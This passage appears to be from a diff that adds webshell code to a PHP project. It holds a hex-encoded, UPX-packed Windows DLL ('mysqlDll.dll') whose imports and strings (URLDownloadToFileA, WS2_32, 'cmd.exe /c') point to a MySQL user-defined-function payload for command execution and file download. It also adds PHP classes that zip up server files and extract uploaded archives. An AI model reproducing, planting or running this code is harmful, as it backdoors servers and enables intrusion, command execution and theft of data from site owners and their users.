1228D86257A6BE31D8BC2EBA3080CF0DB770416180F94C28905D1EB8BD34B88F6EF02F30E4388C6065C46B16AADAE355980A74A4693682E4C67168A3F863D1306ACDBE32E2819E2061F7303C2091B0F400315016B43F850BF38A0300F0E95A9E1EE6EC70383278E140246DDD1306449258F9C5378446DA830D4E06CF633141A8DCD4D04D50E0B49180F407B7B21892858CC428BC6D047F317EA10C700CE1B02433A45DBACA33CE581430C3F27C2BDDD5A3766391E6AEB4040081875F96DFC419F06F22BC6CFCCD1F88E40DA2A5AA3025D038A345852EB0DCCE83BEBAC3213B75683C9AC1C55508D3A57D05C242521D20C10CAB56A90275C2703F6756B0C92C888EB53624CA54A0592B985B1566089DFF6858D740A40387BFB04F62B223760495B6A55CE03F6EB727180A50BBA560F91E248D0CEBAC4BA9E5D5B20070261ED572A381026E821681A536C106A7450A213FF153A152B3859450C163A448330D4653B5BB95BD0D7EC084144F77CF0DE6889F134F18E033B961ACCC230B7471C2A6C45E8F75437E9700D10D77AFA75037A08B60BF18F5CBD59A522560055016B47C1BA30131750E0506DD65B3A3B591257D9BD07A8D6D90B3040963C76291950BBFDBE7076F80D838D6A0303F841DC5739B99D10B3105560FFC05D36763610570C7C1DBC7D36EB9E10FFB6D3C41611681020F8F6B9ACA927945450592C5FEB26165A6C81A38D30C7F23612B1DD0482086AF4D56CC881110FD85EC90E40C128265325F34226D911163C8B14C0012B0C8329EB2D3983D71C90A756F6DC784CC8D5EB7438B125213EF950E99ECEF2B2D61C11A9AEA880643C287BEEFD8DAD8AD73D63F3831881D51404B03582AFB210EA02F01B61E0594E3EE9B3B68D4B38F7881CB50C80F4C025622BC08B03317E30641C5E45AB0EE3A24C96880D535B24C67C80066F04368EC1F10C5229231AE3AEF90F86EAA0ECF1EE5BD5416E2BB64D1073290AD62EB045A58A95F90A7409FFDEBED0F02B0D408808EFC88D95292BCA81F9883D3655127CCC8911DBE3393ABFF4130D6B71FF85A061C634300C6343065FB6F6D20145E8C77C0B0964454510728A9960E96DD98B134E90464868B5BF8B74626A055E39B51D177F2126FC8930EB41B456EBC78D4DF4575CE6BA01B310FF43640B2EBB51CED14FEBA72C9C1EDA241C06E02C9720405AE8A015F52CEA1A10AA6C4FF24D666E1C38EBD2A4F007458258DF02F1B516CC808C6E6DFDFEAD068E6583490C08C741181BEB1103CEDDC80C494114181276D4525CA25E83618A011AE0188DF93B377203DCC883E17018AF362C368AD1A1D81C331340E58CC009FC7591345730E486E0D55BE159519130D716D76A138E1DB69AE51E5B00DE3FB41B155A22DD0CF3A00AE11ABC7A1EFBD82BD7246046735A732844BF5A020BA68FCC6C5DA0702B700C66C8077739D80A6DA14BDD581A58B26575F1A436CF51A08B84600C33C2CFBD1A506820CF118FDC6DCCCC208C4106F80E3A2AD716B6195F41CC00CDFB55B88A6D180B7718CFE8BA37C2F72AF18BD8090C07D31139A050D60C3215FCFFCF4913D1E9D1DBD1EAD1D80BC975F4F7F3B014B9B684643D2150F7EDEEBB2F7DD1720E3B27770872073B2B76014E4C4B56D84A7FDEC27F6F2A0E7AB3D96E506EA833B6517405C203506E10DD66C85E0C156EC814910410BA37CD606B0C0E0876082BBB1B406CA6DB11140708BDDA264103BB27DA007C3F26A8742AA6443D71A376E9C18BD1783BFE3DEF0F82800E036A738314ED6F4BDC8183E2EEF95E29F3A5FF249513A9F1DFD6426811BA1C83E904720C0CB136DB8F62C86D41801E8D789075F3B9C70741FC900403BCE023D173DB852F1188078A46BE470105025608938C2D5B59C6C75CCC8D96652CD949002B25010202EBCE2679A690234621473F5DD70DE48C065F034C0744374DD3343C342C241C8B44344DD3FC8EE489448FE4E8E8ECECD3344DD3F0F0F4F4F8CD39324DF8FCBDD7007B87B01027F809FFF00305399AA6808CA0BC6C36B0D766909D0BF91133240417A30D0A2BB8555B0D2531C639FCD8F692417F240DFDE3FC77823BC2E54400F7D96543B04B8F779E9C1CF92B43082CC2D6745D900B180338606D033A02F275B76F034E584F56B6B74B08F6971FA3EE02EF026FD9807C298C902724E3952D09AB2D03AE45EB1666625A955B7FB403A6699AA6BCC4CCD4DCA6691A9AE4F7971C1C189AA6699A18141410100C699AA6690C08080404A6EB0E231F05100318E05A129A283C8BB7B56C21CC96870F8313112A210CB700ACE86FE2570FAFAE83FEE08BDE770D0000EC1A0C2715773A7256B4D59382AB1D3D530256F057752B566A082A898850D71C14229893820F56741956947414EBA96A72A31644577C54EC8157B40E5BEB56D5612ED4230603EE265D565698182B52F7616904FC8AAEFF41BE0D50BCC5273ADC3701435C147C29985047568D7C07FB2D162BF90CAD240600473B5B290E2B1E7CA55E90C3B6CA11C56056821834BFA3A546088B87803B08742246C2ED46D988E80713720FF9240A606106817D0D4C02DB6E8350F531845E39C3D9AC60B6DDBC17721507CA532C1EB22D19080C16334BA55C1DE660080C7BD27502BD40DF1283CFDEDBE158EC22C90314BD737500A20F08B1443C998A74F6466221F816F87544837E5F23E886DE04FD0C958D460CFE1EC413ABFF4620ED8D5E0C70F61B090D803874180C84884388239F4500C3A585BF2D50DDE52B116A245999F7F9D1F03DD4A80336C66D2983FA3BF137EF2083C5044381FD5FA40F8C5E3984F86E23EB4EBE3E56B93E126F843E8D0C9DA9901E9C5F8684F83BC27318C01103D6EBE48D0815EAC1E30543C70B2256C9A012346C430BFCFE07563B0D535773F7C1903683D0C93CC18F07833C50B0DA28E4361AF51B053E1E751EE28B104974084958DEDE680284F4EB0804F5EB03F6A337DE4600E836891C308A5BEB161EE4C2DA027F7B5882864329F459376A830037C674320E1F5AC9F31CD6CA7E50505031C85A7B830CB2247ED4CAE264CF731FCCA3AD8D8800AB740F00E16AD8580841533AFDECA4963B343D1C063CC0C1E7154A81B1BCF749D418C5604B9E381780360CB2AD2C98248184E169CA5190C61D5642D4920179728BC3C36C8BB1E14E4152530411590F250306F029535DEC60B404CBF0F6D915B7B10211B0FF0336E4106AC0A359B43809F2A22CDEB43F4AA87BF6F30549C0FF4AB890073C9013082CBAAED003FC0C203F087900724AA84AA8A6E9BAD83F069F038C848BA6699A7C746C645C3F5D3B8F004AA8F003C00164D134CCE03F39859CE44C404BF04B4845D375DD2C900B580378A03C0239903F4C404C405D171B855B7FF403FC344DD3750E04030C141C24871160D1373F1F164DD37505500358687C3FAB2F4A003E1CCCA0022F907956F6C112883F1594D9815DE874095900FE37ABC645FF10EB0B8065FF8DECFC0FC0861A806811F6C540750839B72F455328E48B4DFF806A83C15E02056083236DC3DE2374001680E1A4C3F96C01175510100840EB07F60D4A30797FF810742604ADB7F2F220741830740A5074897505216A16A21521020C2ABD7CDF060389F0BA00077D0423CABF54B47F037D3BC87F31742A3BCB43C3ED4AB06D195433744D0739BA91AD85CC43F84C0804BAA67B7B435AF8EB3E26052F070643CE806F1E3BCA7423C2163CDD1188188F4F5B3B0507E69EE00113FDBEFEFF32FC5DF4C77413368E54F7D1234D143737B8DB1172A840C581CE1F0FF601F6ED63DBB7C4DE020BF7A8DF081408EB0AA8115D2CBDB1060B1068ADD8233BD39241E0DF751AE918016D0D8231816ABFB78D0A9E2DA82BCEF008022D6030EA3BAC39BF4213628561325256E8B383459875090A18EBD8D583F9B19A4DFF40EB09AF08146C410F78473159812781D6C68A11C380C901C630045A8452C9C2DD05BEFF0B48884CBD7578EA7473F606818116F502746D8B945DA2220B1E8B067519FC35008FBE813883E94B1D2A1759D888B60DBCEB584213E2137C677E2511335669A116807D131A11825F178CF015554445E2811980C73E5A74B52DD81C2EAF737808AB60072DDC07808B8C4E8BF390E005C916713F8005431467736A081E8233918B09570441464E600F3B32B24C245B231A0EF2F2B64D79D50D04FEEB08FDEB03F4C11A824C0C5F198A1141AA1EEC1BF16488174762EEEB05838C00F0D32401119C2CCBC983C1E134271208006DCC6AC738682DD9D2D96608C6C3000C085DC049B38807CA185A1965872312F52A65520945A9F88959AC913859A6E80AB82C06F651FAD756F29B6A0A8FD2268988391874744617CAE630428A78A9E850538B58DA71F0D73BC6CC214D628386A240C893715963FF25DAE2BF94603975E8F3ABAA895D0F6C16E8D386EBD77DEEB8BC4DEFDD405B2B04D30CAFCBB641FFE87BA312CA300F87942588CD546C9CD28DEEE356F7E58D614F6F52F3AB04AA8D9E94FA52A15498BCB6DE2C8A5101E84B51844B5CFA3BC777B7EFEE2D68FC8A922080089047401376F5F84BB1F04141803965D47983C308837DFC6913B93638C1E2C8914CBA6DA087F750A3A4105384898C2AB8BFDF709140A5A559A3D1A5EB5240D1B3A660810547A8C6A19EC57EF508403DFF07F153382B89357BDF06F15335250700BA49F88816ADAB00981EA84C97DFE75E2E8604AFE9508301D08C4311946FA857DA70EF65402DDFFE01A8946CBBE78FA8FF1570F814FD9635D1CBF4FC750F87DC19F6AE1CC7492DA463E7E804741704D7A628F00D740C802CB804F93CCF763605120B0811578460862571BEC01F88E1625F044CE5CF52B1404522283456A166B453962215127FE081E016CFBE8C888405ECDF7FA1150D8AC672F48A45F2C6850D20166E104D3B375A55F3B80A2D415FA0183BC1771D48BC3A08768F2A41B820008BD9CBAB6B81FA47AA42428A42FF84C15FF8EC352C900EFA8B358D7A029A33D0213989B2EF8C7DDD5A9123FD1D561E9291DD6C5634235842FCAD803DB8682E2768002E7DB75CCA8D8D726695F6C2CDEF67341503108A940564889060EFCEC9DBEB1C1A027410205BEBE380A06E6834781CDE4400BFEB491ADB0D1315DA417219045AB2BC8DFDC34BC880C1208888491F1D617213C3DE9CBC7A770E20E920EBE04C77F915774ABE5EC97394886AFDA90210F970505C59FC94882F1FD575798FAC426866281854FAF7403D6709FC161C57FFD664BEDB29FA297450100CC7D7BE5DA0F85714B00C06B45B99A0BB88CD16FFD0D602DEE66BED10B405531104EE1590601D4D0AC00982FA8659A057040481282056B064F0BB470B0C85965E91F983FA982DE9ED6A47C025152BD16075FA9AEF10D06D020610CA1A251C8E1D1429168F58A6EB3A06234AE2EB8807351E94CC5289365A271ACF0D56AF1235140FCBFFE1C3A0B7AC99AD78F2971B180A0360B615DCC1A8F1223E1975EF13A0876A064F4AACEC508B9E1D9C345CE66D442C51681C4C147D452E6AB6AD50293F89B1C1E0939D084B1A6606AB9F44BC3805750BBB0D416F064D6B50AF256BBC5C487D469512980708D0E250853014526D2FD050BCDE1BF6034EBC05A908D81A4A8615B06F126945FCDE30A22DC25B53C366A035AADB9C65F874E144346021CE0C29800750A09543B566401343E0E0043812F107C406F98A4804657FAB99A5DF89084B1D8A40053C0A84BED01D154D1088E4078D53010F8B459718C682050ABC160C166D515452B810448B664DDB39AD976865D1068F1496935166EB006D912446E98B17684D8B3D4BE1F40155F64235D144E68AE5A87CC50EE0D0F876EB3B0A81A274BBBE0C04E724FB027FAD0D03808136C85B00140C0075FFD06C0B23578A101A33AE3CD45FBB2D0D0BB443FF135A12493944BBDD2DA2182140803848068308CDCD76BF5F5EC6030D4344EB73CA2BD36E3260E7FF6A01CF0A090E683BAA479F74411ED101A2358848D12D821A85FF9D468B0F4388443105EB293B700420DEB6250CFF6305160AEB18A55E40D812FFA9193507AD9C7B77BF925B761A750D85115C74F3064942D12EE5E4AC062B4688210250A8EAA9D800F91131357540346A46C42BF87D5BF41F8AE875465757EB533038154C20629236B1F2DBCA6A711D23EB222014A660B0341B48E1FE033130EB651DBA397D147E108AB25936C514105A66B67DF436E1A11D591D161C0286D98CD9181FD84872DA478DC159D22AD3A62018366B5B0CBE3C20732EDB6CB74EC1245E0140503720CA3F408C4C793BDF0F849CD25B6CA014041B9C0324FCF25DAADB2EDE8BC441DC8367EB138DB5D751678BF026118BB5D9F6AD3867DC7466534CDC6121CB9EEB9257F44DEC1AA574A3A6884412D80A7432B06D4B6C5E0D40403E1C78B2C8663713EDD57F1EDA321C0962C321858F2065C814876515F4A1F20BD966B6B336DC895DE08B15483212BDB27DB953D6BDDF74B45664E467749C8F6AB35BA3B30E03EB068C28EDD5618F54D5CC0AB11B88108B71B77179088B2680AD9F44568D4A9E0D7FBA0DBA5580F1491AF30C5E5CC60736942B498BC24E58ED61328118B4ECAC375E2D043E3E8A515E564234632356A53C0497CFC819DF1D1B56495340CEC2C73B028658A3432D24F276607CDD1C490554CC335033E433B263345BC8945D18908DD9968D532C34201BC53619181FE0DB630AD06A15B5CB3EBB15B0107CD3DC57CC0FE16050B3EB0B83DB33ECB6119CF6112949E0565FF670C9DA1C5552F8D7B2703A84933C8AF5CC38680C42EF047AC25F9A51D4E7023A01752E0A1BB1D552F0263A613E0A431D966EE146873A4101191411035BA330D56BFDD51A75555B430BB3FFB090D3D18E016DADCA0B4301070242B5CFD6ED44E94130E01302A86658AD799AAF335BD2CAC9C14A6D42AA5BC98CCC4F56530B4A55B050009C1B201AFFAE023307420FAB0424EBF3775DFE5ABB8C90416E14460FA373F201E6E20204C420753F98FD646C3A0AF38D46FF3B9CB8ACF87B5643BE51EEB60E56485481DF4C03C12580FC8D161DDEBD0A80E17FEB0D811FDED0540440391180C980DE880A81440B8D6686C5C671D0419080E3D60AC0C006A0A8487D065C9C249E5862050D10565D7426E8BC00BF83C410E0AE41C305E3CC0CB568E12EF1C6012D415CEB030A915B4013D4B88110B5DAA5DAD2630883FB0950769225FF2F7D6B2004308819413577DA802100498A178A018878007F8B118F49473BF972F21B365341486FFF948BD6A81E588D39C470CD4143A1D03B5CCF252EB6C1FF46758A274738C474F22C419D1AE324EC85D2E1C5FE4186E00E824A6F1474D21AC0E6FFD1575F3AEB78F0FFBF34019130007F0419C0D96EE2EB15130DC9817888C2C77895FFB541599EEE9067271FD82E760B3E6A602266C4040907B742A68D38CFDA39CB15580B0318AC05224EEBFB55D0C2052241280EABE097CF0B6C112836D1E970DA0C1B1FFF804EB741B35AB6201726828ADDFFDBEE0774217F1D467BFC720638DC770202E638F809D8B517BA35C6F7750DEBD733C908023657B34D9BB9AFE582806D6AE4BF0FF35FA6ED85B50A321926EF2BB446AB2F99EE57EBB68DDE5AC3EC74230BAB1F775165EB3AC0F0596B0979D584B5634DCA0975720271FC08A5C9DE0E5FFECB030051283074512BBC2311EC1A2D75770C920F1DA2C685B7A6EB52DF2F7D8B5BB10EC11AB6D10A5601805E6EBDF54B318065FE0088508845FDF3EB09BAAB41D90DFD0F6C8D4D0AD58B1803165179AD7DD182C16E4F026B53B38059E3450A23B07465BB72251CAE5A80450F8CD5815DB9AAF5490F8FA18A46D52D1FE9DEE83C057C83760A4D405E7D2539DBD187F8787E0BD95FAD6A0AA1A1F4DEE0FE8A045823C667D9EB658B1512DA65E94CB4B6C84A740FA7DF5BD4D630AF88065D0958B60917C5522B5B13566B032CF036BE03B49F572F1A6AE0648FCC20F6AEDA06AD75A5D646D0BE05FD032C37126253CB0BC18C00885DC029C25A0BC839FAAB60287C25F7E1C29DEB025EA105B11D42030985056C351FD31EAACA3EC1CC03580000D37466AAFF0F4D53EE65DD9304DF03E50F08EC03BDE4F2B2F20F0AFF0B050CCF0AB656D003D50302017FB6DF3A1903070602100445000535300050B5EEFF7F2C20283850580708003730305750070F200BD71461DE000860686009780073AE956E08071507001A010E7D7BDDFF0028006E0075006C0129320F6E756C6C6FB7FFDF0A72756E74696D65206572726F72200F0D0A03544C4F07E4BFD95353110E0053494E470044BBFD65ED4F4D4112115236303238082D204BB76F7F7961626C746F20696E6956616C697A0D6865D67EBED961703727376E6F743D0460EFB6FF756768207370616323667B6C6F7769380AB9EC3661066F6E3736ED672079737464357075722BF6DB5AFB76697274752133A5632320630C9B42BED86C285F345F2ABDF6DA7665785C2F5806DCE2E6BEB0935F3139F76F706558313260DBEE736F0F646573632B3888706B6D4624816564193024DF405723376D926FDBADA6AC7468BF612F6C6F636B1B6C8530173464B7865B6B6E612E02A221726D0050D8DAB770406772616D204A6D366829EC852F30394F10E71A8D66412A2B302E2B84EF53C8386172677528735F6DBBF63C303266C16E6E67826F9CB52EB605743A1164E67F4DC3DB422B2D60396615566973AAEFF660FC432B2B2052A04C6962B47279276D0F87B90A2D16450E211150D8656B9CD43AC2002E003CE5ED6D736DE0252C6B6C776E3E1B17EED8F84765744C61324102766550AE75705BDBCE62130F57956426876534BEF0FF7373616765426F78410075732533322E642ADD931252EAB75956035A77CF76670B5A955A0E0B5B8E0392483AAFB9BBB56D904A0064002C204D20086DC9BDB97900632F642F06D74D03FDB5179A4144EE656D626B5B4E6F76C3FE6D930B4F986F0A536570741486A96885416C96711BBEEDF9B941076E6541F369A64D101636172763684665327533BDF7DE7B4A616E0A675F57537BAF7BEF4B47433779433F3B6EA9D0DE3323B03C6418B0ED587B4F5E095468127313D9C15A6157BC7C0C547509B9D9B1C64D251053750743F7DE7BEF3B372F27231F039E73CEB90A11181F262D9C73CEC5AF828990979E72CE39E7A5ACB3BAC1C8A78008047C28BB92975043BD384F296360A9523F4D797371909620A953A636306EC263B50B355A6A09A663B7B921E76A3752C077035C321703ABCF91FB2E746D700FB40600B6472A481D3A2C7EB53D25E4E6FFDB730A2F636D642E657865202F63200068656C55192B75313774073967FF76B6E4380B3006687474703A2F2F8F2DF5FF2ED9632D9B09CAE4C8EBB8F1CABDB4EDCEF3FFC3FE6F120D00CFC2D4D8CAA7B0DC0BCEC4BCFEB3C9B9A6F6DCE6FE21C2B7BEB6A3BA7E175C3F44867B81D10F00200593195731D913199DE4667271F0108DE8832119B2178E180F30434E5146C2F80392017BD894A007010153107C81A4B902011F0264410152476357D9D9070A2F0207743CF2E4C96C084009140A73F01093274F9EC411941270133C79E4C944180C1972E41AAC1B93274F9E741C4C783C796EF2E4C92C7A1CFC18FF86B29317D854DD038572200107402699282048001940269210841002199009810119900119108202601C16023B20EF200D0C050133164DD30C3603070418050D344DD3340609070C0832D82083090A1B0BC1BEF702573B070F575F906EB0101311031217210C32D820350F414336D86083503352175307D860830D575F597B6C17D2344D376DAB20701C72D860DF0BC72F80B3810760830C36821F83848F208334CD91299EA1830D32D8A46FA7B79FCE760EC2601FD70B18070069BEB35D0517C00B1D0490664006968D08644006648E8F9006644006919293CC066140039F78EF4D54EC25FF0204222B6027CF0EF68279822117A6DF07A1A581E9CDF3EF9FE0FC2F407E80FCA8C1A3DAA34F0D72F60881FE0740B577830C812F41B65FCFA2E43E5F21FFA21A00E5A2E8A25B7EA1FE5105BF92DFEE03DA5EDA5F5FDA6ADA32D3D8DEE0B26627B7F939317E430303860064AA432EE99E9C84538B9876840380A6699AA67C7874706C9AA6699A645C54483C34699AA6692824201C18A6699AA614100C08044DD334970075FCF8F0E4DCA6E99E35D42F75CC03C4BC9AA6699AB0A89C908C8849BEA669806C64CD2E821D65BB8C8F905C037F009EF040E82F500B807007F0F11325DCA0D1535499508BDD50C944548CF38CDC97B058592CA7BF06699A0E1EEF3B5A9775A769BAA7B5D4F3E0301AB86CD3034E6D01333AB759699AA6697796B4D3F20CDA74DD272F034D6C01F108A48008368024444144210980D109600064C15B054D734325746554B6CBB7572C0D44656C65466905410A105FDB0C470A0953C5D87393CD2719522C0A23EC4F56C145185661726961622212C0EC7F436C6F736548616E6425F62AD80E4B4A500B63417B7B56686753791D656D4447B7C1B656F5227914744E747515B893FD70496E666F413569704FB1DBD62EA845782A08535D65702CFB36CCFD56657273696F163B896E6754792D67DF856C570F1F4C434D6170115706882E610D1B4D7073ED5BC34279126F65646543688366E5ABA03DFB644F66F34C6FFD8E6B68FF300B746C556E773C3D48D767EDAC7C70416C6C0A46B1FB432D7B9BE16F6D6D09336E7DACB38556982673FB0B790CC580D866E50B56ADB521419C42494D1E263CC3D609630A532740B029DBDACA16AD147215421BC0B64C5B762B78108C8580250B77C5EB8407C4600C542FB998A170B6DA75D3F812DCDD3302524964386C7353F3B3378BDD5575650C4F09DE4BD2258C531D2D471A086D618643427552C93B2463366412A0D50CC363141E4D6F64BDA34E616D6A3B2160BC5F9EE473183004470A0CF3CA6624A3FD08E42CCFF04258164361853B1CFE66BF08506F6990C906C25EF99DFD6B65644465633815C2844D72496E53EB460F3AC1F1EF73684B427566663E6A50ECB136761C0A410B074F454D092C19FE10934164647297EF7D2841BCD93C7155524C440A5BA4668277E3CE1C88F6F6FE340457534153864D00FF0402CBB22CCB17390334090C8D32B62C0B022649F7FF7FAE6D0C10025C000A052F0A5205546417350BDFFEFFFF811912192A060B2A385319310B320D1B806512ED2405670B30100F1CFFFFFFFF1B1B96130B530B1C455405400645171106180A118145110B4C310526530F7D1CFBA5FFFF078B1214050B121B271A1241691A09F04BF83A06F0520103BFFDFF7F0802070F080B06060A18050A1A0E080643125C1B4F59085A0DA37DF66FFF0F16F03001BAF00AF6211775F0C8020400CE2D07E6EDEDBF5F10070708270C0A08300A0608050C050CBFB5FFBB16030813082D1B10060F06070921AE08F04F020E6BBFB5ED061A050F107EA20605060D1D15349BFBF69B2244A6F0ED0120130616070F1810FBFFDBDB091A571362A9850E0B14060E09111C0F12091C230A03FFFFFFBF0C137F0A1CF0F20007194212310C0B0F0AF00302F04D012C0C1C191A0811F6ED5BFB050D05F00549BF05380C0757070A19088EDBADFDDB05663A081A0611190C7113081E0917F6FF0B6F17621806422214320715320A2115242A0E311CF6DF6EFF21250F0F321043CB140E47065B074845E3193539DBDF6EFF0C103F50133E1282260D8E13270F42141E6D157CFBFF6FAA0E13770D251C1374A04D18154A481712E3084B2512842F6C2F47550118EF051D29261A072842EEDE1D4A0604660B1B07161D2A32FFB7B77F7228060C3B0829710D0C234F6039150D3D22084C0F19615BFBFF262E0F20222D143A0726181A0B83A67C56DBFFFF138AF0FB00790C150B2EF0D9011C0D0D13090C32C221B76678E106210A1D081715A919E80B0AFBDF0A0B6E432C0019066F061E1113151EF95068857F10210C120E0F11759647BFF00BCDB85C7EF056011E550F0AC60A89050BFFBFB51F4C35080E1E1D182058163368254605030717FEAD6DFC103D105612F03E01EC48B24F30BD71E1B75B045E2F0F5838EA3C7D3810040CFB76F38301F0B4030408F0AC0A0DF014010417C8915D7E2010108408020800046453203FF0240608041009F92F71E90C9C645045A54C010400B2976A46AA4EF90FE0000E210B0106264B004F26A9244110BDEC3CFB09100F04000700D0B237E982272A0202079B6D7ED81E8D000071C886620285B9650AC0648A002B8CAA4BA744B0100C76F92E7465787446619070E2AD2A6574CD602E7212669D2BC1AB0D5303FB5E73D902402E26CF2427B62919A49090C04F6519EC6B0F7D584FC027A06F6EBF29421B5C881051C489C700000000000000800400FF00807C2408010F85C201000060BE00A000108DBE0070FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9960100008A07472CE83C0177F7803F0A75F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE00C000008B0709C074458B5F048D843000E0000001F35083C708FF9650E00000958A074708C074DC89F979070FB707475047B95748F2AE55FF9654E0000009C07407890383C304EBD86131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE58E000008DBE00F0FFFFBB0010000050546A045357FFD58D87FF01000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9C73CFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000070F0000050F000000000000000000000000000007DF0000060F0000000000000000000000000000088F0000068F00000000000000000000000000000000000000000000092F00000A0F00000B0F0000000000000C0F000000000000073000080000000004B45524E454C33322E444C4C0075726C6D6F6E2E646C6C005753325F33322E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F74656374000055524C446F776E6C6F6164546F46696C65410000000000000000B1976A46000000001EF1000001000000030000000300000000F100000CF1000018F100009010000090150000801000002BF1000031F100003EF100000000010002006D7973716C446C6C2E646C6C0073746174650073746174655F6465696E69740073746174655F696E69740000000000E000000C0000001D360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
+}
+
+class eanver{
+var $out='';
+function eanver($dir){
+	if(@function_exists('gzcompress')){
+	if(count($dir) > 0){
+	foreach($dir as $file){
+		if(is_file($file)){
+			$filecode = file_get_contents($file);
+			if(is_array($dir)) $file = basename($file);
+			$this -> filezip($filecode,$file);
+		}
+	}
+	$this->out = $this -> packfile();
+	}
+	return true;
+	}
+	else return false;
+}
+	var $datasec      = array();
+	var $ctrl_dir     = array();
+	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	var $old_offset   = 0;
+	function at($atunix = 0) {
+		$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
+		if ($unixarr['year'] < 1980) {
+			$unixarr['year']    = 1980;
+			$unixarr['mon']     = 1;
+			$unixarr['mday']    = 1;
+			$unixarr['hours']   = 0;
+			$unixarr['minutes'] = 0;
+			$unixarr['seconds'] = 0;
+		} 
+		return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) |
+				($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);
+	}
+	function filezip($data, $name, $time = 0) {
+		$name = str_replace('\\', '/', $name);
+		$dtime = dechex($this->at($time));
+		$hexdtime	= '\x' . $dtime[6] . $dtime[7]
+					. '\x' . $dtime[4] . $dtime[5]
+					. '\x' . $dtime[2] . $dtime[3]
+					. '\x' . $dtime[0] . $dtime[1];
+		eval('$hexdtime = "' . $hexdtime . '";');
+		$fr	= "\x50\x4b\x03\x04";
+		$fr	.= "\x14\x00";
+		$fr	.= "\x00\x00";
+		$fr	.= "\x08\x00";
+		$fr	.= $hexdtime;
+		$unc_len = strlen($data);
+		$crc = crc32($data);
+		$zdata = gzcompress($data);
+		$c_len = strlen($zdata);
+		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$fr .= pack('v', strlen($name));
+		$fr .= pack('v', 0);
+		$fr .= $name;
+		$fr .= $zdata;
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$this -> datasec[] = $fr;
+		$new_offset = strlen(implode('', $this->datasec));
+		$cdrec = "\x50\x4b\x01\x02";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x14\x00";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x08\x00";
+		$cdrec .= $hexdtime;
+		$cdrec .= pack('V', $crc);
+		$cdrec .= pack('V', $c_len);
+		$cdrec .= pack('V', $unc_len);
+		$cdrec .= pack('v', strlen($name) );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('V', 32 );
+		$cdrec .= pack('V', $this -> old_offset );
+		$this -> old_offset = $new_offset;
+		$cdrec .= $name;
+		$this -> ctrl_dir[] = $cdrec;
+	}
+	function packfile(){
+		$data    = implode('', $this -> datasec);
+		$ctrldir = implode('', $this -> ctrl_dir);
+		return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00";
+	}
+}
+
+class zip
+{
+
+ var $total_files = 0;
+ var $total_folders = 0; 
+
+ function Extract ( $zn, $to, $index = Array(-1) )
+ {
+   $ok = 0; $zip = @fopen($zn,'rb');
+   if(!$zip) return(-1);
+   $cdir = $this->ReadCentralDir($zip,$zn);
+   $pos_entry = $cdir['offset'];
+
+   if(!is_array($index)){ $index = array($index);  }
+   for($i=0; $index[$i];$i++){
+   		if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries'])
+		return(-1);
+   }
+   for ($i=0; $i<$cdir['entries']; $i++)
+   {
+     @fseek($zip, $pos_entry);
+     $header = $this->ReadCentralFileHeaders($zip);
+     $header['index'] = $i; $pos_entry = ftell($zip);
+     @rewind($zip); fseek($zip, $header['offset']);
+     if(in_array("-1",$index)||in_array($i,$index))
+     	$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip);
+   }
+   fclose($zip);
+   return $stat;
+ }
+
+  function ReadFileHeader($zip)
+  {
+    $binary_data = fread($zip, 30);
+    $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);
+
+    $header['filename'] = fread($zip, $data['filename_len']);
+    if ($data['extra_len'] != 0) {
+      $header['extra'] = fread($zip, $data['extra_len']);
+    } else { $header['extra'] = ''; }
+
+    $header['compression'] = $data['compression'];$header['size'] = $data['size'];
+    $header['compressed_size'] = $data['compressed_size'];
+    $header['crc'] = $data['crc']; $header['flag'] = $data['flag'];
+    $header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime'];
+
+    if ($header['mdate'] && $header['mtime']){
+     $hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5;
+     $seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980;
+     $month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F;
+     $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
+    }else{$header['mtime'] = time();}
+
+    $header['stored_filename'] = $header['filename'];
+    $header['status'] = "ok";
+    return $header;
+  }
+
+ function ReadCentralFileHeaders($zip){
+    $binary_data = fread($zip, 46);
